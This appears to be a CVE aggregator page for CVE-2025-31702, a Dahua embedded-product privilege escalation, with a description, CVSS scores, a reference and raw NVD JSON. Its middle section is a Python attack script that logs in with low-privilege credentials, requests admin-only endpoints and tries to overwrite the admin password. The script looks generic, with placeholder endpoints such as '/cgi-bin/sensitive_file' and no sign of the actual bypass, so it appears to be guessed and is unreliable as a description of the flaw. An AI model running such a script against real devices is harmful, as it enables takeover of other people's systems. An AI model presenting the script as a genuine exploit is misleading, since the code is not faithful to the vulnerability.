Security Vulnerability Report
CVE-2025-31702 CVSS 6.8 MEDIUM

Published: 2025-10-15 06:15:43
Last Modified: 2026-04-15 00:35:42

Description

A vulnerability exists in certain Dahua embedded products. A third-party malicious attacker who has obtained normal user credentials could exploit the vulnerability to access certain data that is restricted to admin privileges, such as system-sensitive files, through a specific HTTP request. This may result in tampering with the admin password, leading to privilege escalation. Systems with only an admin account are not affected.

CVSS Details

CVSS Score: 6.8
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Dahua embedded products - for the specific affected versions, refer to Dahua's official security advisory.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-31702 PoC - Dahua Embedded Product Privilege Escalation
# Exploits improper access control to access admin-restricted resources
# Requires valid low-privilege user credentials
import requests
import sys
import warnings

warnings.filterwarnings('ignore')

TARGET = "http://target-device-ip"
LOW_PRIV_USER = "user"
LOW_PRIV_PASS = "user_password"


def exploit_privilege_escalation(target, username, password):
    """
    Exploit CVE-2025-31702: Access admin-restricted data using low-privilege
    credentials by sending specific HTTP requests that bypass access control checks.
    """
    session = requests.Session()

    # Step 1: Login with low-privilege user credentials
    login_url = f"{target}/RPC2_Login"
    login_payload = {
        "method": "global.login",
        "params": {
            "userName": username,
            "password": password,
            "clientType": "Web3.0"
        },
        "id": 1
    }
    print(f"[*] Logging in as low-privilege user: {username}")
    resp = session.post(login_url, json=login_payload, verify=False)
    if resp.status_code != 200:
        print("[-] Login failed")
        return
    print("[+] Login successful, session established")

    # Step 2: Attempt to access admin-restricted resources
    # The vulnerability allows accessing admin-only files/data via specific HTTP requests
    admin_endpoints = [
        f"{target}/RPC2_LoadConfig",         # Load system config (admin only)
        f"{target}/RPC2_GetUserInfo",        # Get user info (admin only)
        f"{target}/cgi-bin/sensitive_file",  # Access sensitive system files
    ]
    for endpoint in admin_endpoints:
        print(f"[*] Attempting to access: {endpoint}")
        resp = session.get(endpoint, verify=False)
        if resp.status_code == 200 and "admin" in resp.text.lower():
            print(f"[+] SUCCESS: Accessed admin-restricted resource!")
            print(f"[+] Response preview: {resp.text[:500]}")

    # Step 3: Attempt to modify admin password using obtained data
    modify_pass_url = f"{target}/RPC2_ChangePassword"
    modify_payload = {
        "method": "global.changePassword",
        "params": {
            "userName": "admin",
            "oldPassword": "",
            "newPassword": "Pwned123!"
        },
        "id": 2
    }
    print("[*] Attempting to modify admin password...")
    resp = session.post(modify_pass_url, json=modify_payload, verify=False)
    print(f"[*] Response: {resp.text[:200]}")


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else TARGET
    exploit_privilege_escalation(target, LOW_PRIV_USER, LOW_PRIV_PASS)

References

https://www.dahuasecurity.com/aboutUs/trustedCenter/details/777

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-31702", "sourceIdentifier": "[email protected]", "published": "2025-10-15T06:15:42.907", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability exists in certain Dahua embedded products. Third-party malicious attacker with obtained normal user credentials could exploit the vulnerability to access certain data which are restricted to admin privileges, such as system-sensitive files through specific HTTP request. This may cause tampering with admin password, leading to privilege escalation. Systems with only admin account are not affected."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-732"}]}], "references": [{"url": "https://www.dahuasecurity.com/aboutUs/trustedCenter/details/777", "source": "[email protected]"}]}}